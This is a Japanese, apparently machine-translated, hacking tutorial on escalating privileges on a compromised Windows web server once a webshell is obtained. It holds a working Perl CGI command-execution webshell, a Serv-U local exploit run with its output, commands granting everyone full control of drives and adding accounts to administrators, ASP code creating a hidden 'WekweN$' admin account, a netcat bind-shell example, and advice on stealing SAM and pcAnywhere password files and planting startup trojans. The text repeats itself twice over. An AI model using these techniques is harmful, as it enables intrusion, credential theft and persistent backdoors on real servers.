権限の向上(web)究極の9つのテクニック
5699 ワード
Webshellを取得すると、次は権限を高めることです.
個人的なまとめは以下の通りです.
1:C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhereこのディレクトリにジャンプできるかどうかを見て、もしよろしければ、直接そのCIFファイルをダウンロードして、pcAnywhereパスワードを得て、ログインします
2.C:WINNTsystem 32configここに入ってそのSAMを降りて、ユーザーのパスワードを解読します
samのパスワードを解読するためのソフトウェアはLC、SAMinsideがあります
3.C:Documents and SettingsAll Users「スタート」メニュープログラムここでジャンプできますか?ここから役に立つ情報をたくさん入手できます
多くのショートカットを見ることができます.私たちは一般的にサービス-Uを選択して、ローカルで属性を見て、パスを知ってから、ジャンプできるかどうかを見ます.
中に入ると、サービスUDaemonを修正する権限がある場合.ini、ユーザーを追加して、パスワードは空です
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
このユーザーは最高の権限を持っていて、ftpでquote site exec xxxに行って権限を高めることができます.
4.c:wintsystem 32inetsrvdataはこのディレクトリで、同じくerveryoneが完全に制御しています.私たちがしなければならないのは、権限を高めるツールをアップロードし、実行することです.
5.次のディレクトリにジャンプできるかどうかを確認する
c:php、phpspyで
c:prel、このディレクトリとは限らない場合があります(同じようにショートカットをダウンロードして属性を見ることができます)cgiのwebshellで
#!/usr/bin/perl
binmode(stdOUT);
syswrite(stdOUT, "Content-type: text/html\r\r", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(stdOUT, "
close(stdERR);
close(stdOUT);
exit;
cgi実行として保存し、
もしだめなら、pl拡張を試してみてください.さっきのcgiファイルをplファイルに変更して、提出してください.http://anyhost//cmd.pl?dir
「アクセス拒否」が表示され、実行可能であることを示します.すぐに提出します:先にsuをアップロードします.exe(ser-u権限向上ツール)prelのbinディレクトリへ
http://anyhost//cmd.pl?c\perl\bin\su.exe
戻り値:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
IUSR権限、コミット:
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
次の情報を返すと、成功したことを示します.
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
すべてのパーティションをeveryone完全制御
ユーザーを管理者に昇格させます.
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"
6.「cscript C:InetpubAdminScriptsadsutil.vbs get w 3 svc/inprocessisapiapiapps」を正常に実行して権限を高める
このcscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps
特権のあるdllファイルを表示する:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
またasp.dll特権ファミリーへの加入
asp.dllはc:wintsystem 32inetsrvaspに置かれています.dll(異なるマシンの位置が必ずしも同じとは限らない)
cscript adsutilを追加します.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
cscript adsutilを使用できます.vbs get/W 3 SVC/InProcessIsapiAppsが追加されたかどうかを確認します
7.このコードでアップグレードすることもできますが、効果は明らかではないようです.
<%@codepage=936%>on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user","WekweN$")
od.SetPassword "WekweN" od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write"WekweN$スーパーアカウントの作成に成功しました!"%>
このコードでアップグレードに成功したかどうかを確認します.
on error resume next'Administratorsグループアカウントの検索
Set tN=server.CreateObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&""
Next
if err then
Response.write「だめだよ:Wscript.Network」
end if
%>
8.C:Program FilesJava Web Startここでできれば、普通は小さくて、jspのwebshellを使ってみることができますが、権限が小さくて、本人は出会ったことがないそうです.
9.最後に、ホストの設定が変態であれば、c:Documents and SettingsAll Users「スタート」メニュープログラムスタート」でbat、vbsなどの木馬を書き込んでみてください.
ホストが再起動するかddosが再起動を強要して、権限の向上の目的を達成します.
個人的なまとめは以下の通りです.
1:C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhereこのディレクトリにジャンプできるかどうかを見て、もしよろしければ、直接そのCIFファイルをダウンロードして、pcAnywhereパスワードを得て、ログインします
2.C:WINNTsystem 32configここに入ってそのSAMを降りて、ユーザーのパスワードを解読します
samのパスワードを解読するためのソフトウェアはLC、SAMinsideがあります
3.C:Documents and SettingsAll Users「スタート」メニュープログラムここでジャンプできますか?ここから役に立つ情報をたくさん入手できます
多くのショートカットを見ることができます.私たちは一般的にサービス-Uを選択して、ローカルで属性を見て、パスを知ってから、ジャンプできるかどうかを見ます.
中に入ると、サービスUDaemonを修正する権限がある場合.ini、ユーザーを追加して、パスワードは空です
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
このユーザーは最高の権限を持っていて、ftpでquote site exec xxxに行って権限を高めることができます.
4.c:wintsystem 32inetsrvdataはこのディレクトリで、同じくerveryoneが完全に制御しています.私たちがしなければならないのは、権限を高めるツールをアップロードし、実行することです.
5.次のディレクトリにジャンプできるかどうかを確認する
c:php、phpspyで
c:prel、このディレクトリとは限らない場合があります(同じようにショートカットをダウンロードして属性を見ることができます)cgiのwebshellで
#!/usr/bin/perl
binmode(stdOUT);
syswrite(stdOUT, "Content-type: text/html\r\r", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(stdOUT, "
\r
", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r
close(stdERR);
close(stdOUT);
exit;
cgi実行として保存し、
もしだめなら、pl拡張を試してみてください.さっきのcgiファイルをplファイルに変更して、提出してください.http://anyhost//cmd.pl?dir
「アクセス拒否」が表示され、実行可能であることを示します.すぐに提出します:先にsuをアップロードします.exe(ser-u権限向上ツール)prelのbinディレクトリへ
http://anyhost//cmd.pl?c\perl\bin\su.exe
戻り値:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
IUSR権限、コミット:
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
次の情報を返すと、成功したことを示します.
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
すべてのパーティションをeveryone完全制御
ユーザーを管理者に昇格させます.
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"
6.「cscript C:InetpubAdminScriptsadsutil.vbs get w 3 svc/inprocessisapiapiapps」を正常に実行して権限を高める
このcscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps
特権のあるdllファイルを表示する:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
またasp.dll特権ファミリーへの加入
asp.dllはc:wintsystem 32inetsrvaspに置かれています.dll(異なるマシンの位置が必ずしも同じとは限らない)
cscript adsutilを追加します.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
cscript adsutilを使用できます.vbs get/W 3 SVC/InProcessIsapiAppsが追加されたかどうかを確認します
7.このコードでアップグレードすることもできますが、効果は明らかではないようです.
<%@codepage=936%>on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user","WekweN$")
od.SetPassword "WekweN" od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write"WekweN$スーパーアカウントの作成に成功しました!"%>
このコードでアップグレードに成功したかどうかを確認します.
on error resume next'Administratorsグループアカウントの検索
Set tN=server.CreateObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&""
Next
if err then
Response.write「だめだよ:Wscript.Network」
end if
%>
8.C:Program FilesJava Web Startここでできれば、普通は小さくて、jspのwebshellを使ってみることができますが、権限が小さくて、本人は出会ったことがないそうです.
9.最後に、ホストの設定が変態であれば、c:Documents and SettingsAll Users「スタート」メニュープログラムスタート」でbat、vbsなどの木馬を書き込んでみてください.
ホストが再起動するかddosが再起動を強要して、権限の向上の目的を達成します.